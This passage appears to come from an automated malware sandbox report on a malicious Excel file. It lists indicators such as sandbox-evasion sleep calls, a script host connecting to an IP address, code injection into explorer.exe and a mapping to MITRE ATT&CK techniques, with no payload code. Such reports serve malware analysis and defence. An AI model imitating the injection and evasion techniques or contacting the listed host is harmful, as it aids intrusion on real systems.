      Source: C:\Windows\System32\wscript.exe TID: 2476Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3044Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3044Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2972Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\wscript.exe TID: 2268Thread sleep time: -180000s >= -30000sJump to behavior
      Source: explorer.exe, 00000006.00000003.2097618855.00000000002BA000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.27.136.242 187Jump to behavior
      Injects code into the Windows Explorer (explorer.exe)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 896 base: 50000 value: 01Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 896 base: 50020 value: 9AJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 896 base: 7FFFFFD5368 value: 00Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2832 base: 50000 value: 01Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2832 base: 50020 value: 9AJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2832 base: 7FFFFFD7368 value: 00Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2844 base: 50000 value: 01Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2844 base: 50020 value: 9AJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2844 base: 7FFFFFD8368 value: 00Jump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting321Path InterceptionProcess Injection21Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection21Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting321NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet